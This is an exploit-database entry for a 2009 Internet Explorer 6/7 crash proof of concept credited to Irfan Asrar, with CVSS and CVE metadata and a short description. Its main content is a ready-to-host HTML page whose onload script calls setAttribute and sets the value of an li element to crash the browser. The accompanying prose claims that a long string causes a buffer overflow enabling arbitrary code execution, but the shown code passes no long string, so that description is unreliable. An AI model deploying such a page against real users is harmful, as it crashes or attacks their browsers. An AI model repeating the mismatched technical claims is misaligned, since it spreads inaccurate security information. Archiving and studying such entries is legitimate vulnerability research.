header-logo
Suggest Exploit
vendor:
Internet Explorer
by:
Irfan Asrar
9,3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Internet Explorer
Affected Version From: IE6 XP2
Affected Version To: IE7 Vista
Patch Exists: YES
Related CWE: CVE-2009-2510
CPE: a:microsoft:internet_explorer
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP, Windows Vista
2009

Set Attribute Crash

This vulnerability is caused by a buffer overflow in the setAttribute() method of Internet Explorer. When a long string is passed to the setAttribute() method, it causes a buffer overflow and can be used to execute arbitrary code. This vulnerability affects Internet Explorer versions 6 and 7 on Windows XP and Vista.

Mitigation:

Microsoft has released a patch for this vulnerability.
Source

Exploit-DB raw data:

<html>
 <head>
  <title> Irfan Asrar</title>
 </head>
<body onload="c()">
Set Attribute Crash : Tested with IE7 Vista
                                  IE6 XP2
                                  IE6 XP3

<script type="text/javascript">

function c() {

var li = document.createElement("li");
li.setAttribute("value", "1");
li.value = "1";

}

</script>
 </body>
</html>

# milw0rm.com [2009-08-18]